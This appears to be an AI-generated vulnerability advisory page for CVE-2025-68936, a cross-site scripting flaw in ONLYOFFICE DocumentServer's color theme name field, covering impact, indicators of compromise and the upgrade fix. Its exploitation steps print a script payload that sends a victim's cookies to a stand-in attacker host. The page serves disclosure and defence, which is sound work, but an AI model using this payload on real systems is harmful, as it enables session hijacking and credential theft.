CVE-2025-68936
ONLYOFFICE DocumentServer vulnerability analysis and mitigation

Overview

CVE-2025-68936 is a Cross-Site Scripting (XSS) vulnerability in ONLYOFFICE Docs (DocumentServer) that allows attackers to inject malicious scripts via the Color theme name field. It affects all versions of ONLYOFFICE DocumentServer before 9.2.1. The vulnerability was published on December 25, 2025, and has a CVSS v3.1 base score of 6.1 (Medium) (Red Hat CVE, ONLYOFFICE Changelog).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), rooted in insufficient sanitization of user-supplied input in the Color theme name field within ONLYOFFICE DocumentServer. An attacker can craft a malicious theme name containing JavaScript payloads that are rendered and executed in the victim's browser when they interact with the themed document or interface. Exploitation requires user interaction (e.g., a victim opening or viewing a crafted document/theme), and no authentication is required to deliver the payload. The scope is changed, meaning the injected script can affect resources beyond the originating document context (Red Hat CVE, ONLYOFFICE Changelog).

Impact

Successful exploitation can result in low-level confidentiality and integrity impacts within the victim's browser session, such as session token theft, credential harvesting, or unauthorized actions performed on behalf of the victim. Because the scope is changed, the injected script may affect browser contexts beyond the immediate application, potentially enabling phishing or data exfiltration. Availability is not directly impacted by this vulnerability (Red Hat CVE).

Exploitation steps

  1. Identify target: Locate an ONLYOFFICE Docs (DocumentServer) instance running a version prior to 9.2.1 that allows users to create or share custom color themes.
  2. Craft malicious theme name: Create a color theme with a name containing an XSS payload, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent event-handler-based payload.
  3. Deliver to victim: Share the malicious document or theme with the target user, or host it on a shared ONLYOFFICE instance where the victim is likely to open it.
  4. Trigger execution: When the victim opens the document or views the theme in their browser, the unsanitized theme name is rendered as HTML, causing the injected script to execute in the victim's browser context.
  5. Achieve objective: The attacker can steal session cookies, perform actions on behalf of the victim, or redirect the user to a phishing page (ONLYOFFICE Changelog, Red Hat CVE).

Indicators of compromise

  • Network: Unexpected outbound HTTP requests from a user's browser to external domains shortly after opening an ONLYOFFICE document; requests to attacker-controlled URLs containing encoded cookie or session data.
  • Logs: Web server or application logs showing theme name fields containing HTML tags or JavaScript keywords (e.g., <script>, onerror=, javascript:) in POST/PUT requests to the DocumentServer API.
  • Browser: Unexpected redirects or pop-ups when opening ONLYOFFICE documents; browser developer tools showing script execution originating from theme name rendering.

Mitigation and workarounds

ONLYOFFICE has addressed this vulnerability in DocumentServer version 9.2.1. Users should upgrade to version 9.2.1 or later as the primary remediation. No specific configuration-based workarounds have been publicly documented; restricting access to theme creation/sharing features for untrusted users may reduce exposure until patching is possible (ONLYOFFICE Changelog, Red Hat CVE).

Community reactions

Coverage of CVE-2025-68936 has been limited to vulnerability database aggregators and automated security feeds. Red Hat tracked the CVE as of December 26, 2025. No notable researcher commentary, vendor blog posts, or significant social media discussion beyond automated CVE announcements has been identified for this vulnerability.

Additional resources


SourceThis report was generated using AI

Related ONLYOFFICE DocumentServer vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2023-46988MEDIUM6.7
  • ONLYOFFICE DocumentServer logoONLYOFFICE DocumentServer
  • cpe:2.3:a:onlyoffice:document_server
NoYesApr 01, 2025
CVE-2025-68917MEDIUM6.4
  • ONLYOFFICE DocumentServer logoONLYOFFICE DocumentServer
  • cpe:2.3:a:onlyoffice:document_server
NoYesDec 24, 2025
CVE-2025-68936MEDIUM6.1
  • ONLYOFFICE DocumentServer logoONLYOFFICE DocumentServer
  • cpe:2.3:a:onlyoffice:document_server
NoYesDec 25, 2025
CVE-2025-68935MEDIUM6.1
  • ONLYOFFICE DocumentServer logoONLYOFFICE DocumentServer
  • cpe:2.3:a:onlyoffice:document_server
NoYesDec 25, 2025
CVE-2023-50883MEDIUM6.1
  • ONLYOFFICE DocumentServer logoONLYOFFICE DocumentServer
  • cpe:2.3:a:onlyoffice:document_server
NoYesSep 09, 2024

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management